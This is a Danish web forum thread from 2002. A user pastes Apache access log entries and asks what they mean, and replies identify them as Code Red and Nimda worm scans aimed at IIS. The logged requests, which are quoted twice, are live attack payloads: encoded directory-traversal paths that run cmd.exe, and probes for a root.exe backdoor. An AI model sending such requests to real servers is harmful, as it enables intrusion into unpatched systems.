|
| Tydning af apache log Fra : Duca |
Dato : 26-03-02 22:29 |
|
Hejsa!
Sakset fra apache access log'en:
80.63.225.203 - - [22/Mar/2002:02:56:47 +0100] "GET
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 286
80.63.225.203 - - [22/Mar/2002:02:56:47 +0100] "GET
/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 286
80.63.225.203 - - [22/Mar/2002:02:56:47 +0100] "GET
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303
80.63.225.203 - - [22/Mar/2002:02:56:48 +0100] "GET
/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303
80.63.184.45 - - [22/Mar/2002:04:00:01 +0100] "GET /scripts/root.exe?/c+dir
HTTP/1.0" 404 281
80.63.225.203 - - [22/Mar/2002:04:16:05 +0100] "GET
/scripts/root.exe?/c+dir HTTP/1.0" 404 281
80.63.225.203 - - [22/Mar/2002:04:16:05 +0100] "GET /MSADC/root.exe?/c+dir
HTTP/1.0" 404 279
80.63.225.203 - - [22/Mar/2002:04:16:05 +0100] "GET
/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 289
80.63.225.203 - - [22/Mar/2002:04:16:06 +0100] "GET
/d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 289
----
Dette forsætter i en uedelighed, i error loggen er der tilsvarende fejl om
at cmd.exe og root.exe ikke kan findes (naturligvis, var jeg ved at sige)!?
Hvad betyder alt dette?
Mvh
-Christoffer
| |
Martin Andersen (26-03-2002)
| Kommentar Fra : Martin Andersen |
Dato : 26-03-02 22:40 |
|
Duca wrote:
> Hejsa!
>
CUT
Er det ikke forkert gruppe ?
Martin.
| |
Kent Friis (26-03-2002)
| Kommentar Fra : Kent Friis |
Dato : 26-03-02 22:41 |
|
Den Tue, 26 Mar 2002 22:28:49 +0100 skrev Duca:
>Hejsa!
>
>Sakset fra apache access log'en:
> 80.63.225.203 - - [22/Mar/2002:02:56:47 +0100] "GET
>/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 286
> 80.63.225.203 - - [22/Mar/2002:02:56:47 +0100] "GET
>/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 286
> 80.63.225.203 - - [22/Mar/2002:02:56:47 +0100] "GET
>/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303
> 80.63.225.203 - - [22/Mar/2002:02:56:48 +0100] "GET
>/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303
> 80.63.184.45 - - [22/Mar/2002:04:00:01 +0100] "GET /scripts/root.exe?/c+dir
>HTTP/1.0" 404 281
> 80.63.225.203 - - [22/Mar/2002:04:16:05 +0100] "GET
>/scripts/root.exe?/c+dir HTTP/1.0" 404 281
> 80.63.225.203 - - [22/Mar/2002:04:16:05 +0100] "GET /MSADC/root.exe?/c+dir
>HTTP/1.0" 404 279
> 80.63.225.203 - - [22/Mar/2002:04:16:05 +0100] "GET
>/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 289
> 80.63.225.203 - - [22/Mar/2002:04:16:06 +0100] "GET
>/d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 289
>----
>Dette forsætter i en uedelighed, i error loggen er der tilsvarende fejl om
>at cmd.exe og root.exe ikke kan findes (naturligvis, var jeg ved at sige)!?
>Hvad betyder alt dette?
At Microsoft's kunder stadig ikke har fået patchet og ryddet op efter
Code Red, Nimda og hvad de ellers hedder.
Ikke noget at bekymre dig om, når du ikke kører IIS.
Mvh
Kent
--
Advarsel: ny e-mail adresse - med risiko for at mails går tabt.
Den gamle adresse virker stadig, men bliver primært checket i
arbejdstiden.
| |
Anders Lund (26-03-2002)
| Kommentar Fra : Anders Lund |
Dato : 26-03-02 22:51 |
|
"Duca" <ask@news.dk> skrev i en meddelelse
news:3ca0e747$0$87766$edfadb0f@dspool01.news.tele.dk...
> Hejsa!
>
> Sakset fra apache access log'en:
<Snip>
> Hvad betyder alt dette?
Min server bliver også bombet med dem, 10sek på google gav mig følgende:
http://www.securityspace.com/smysecure/w32_nmda_amm.html
--
Mvh
Anders Lund
Programmør på OverClocking.dk
| |
Duca (27-03-2002)
| Kommentar Fra : Duca |
Dato : 27-03-02 00:07 |
|
Hej igen!
Tusind tak for svarende - så kan jeg også sove godt i nat :)
Mvh
- Christoffer
| |
|
|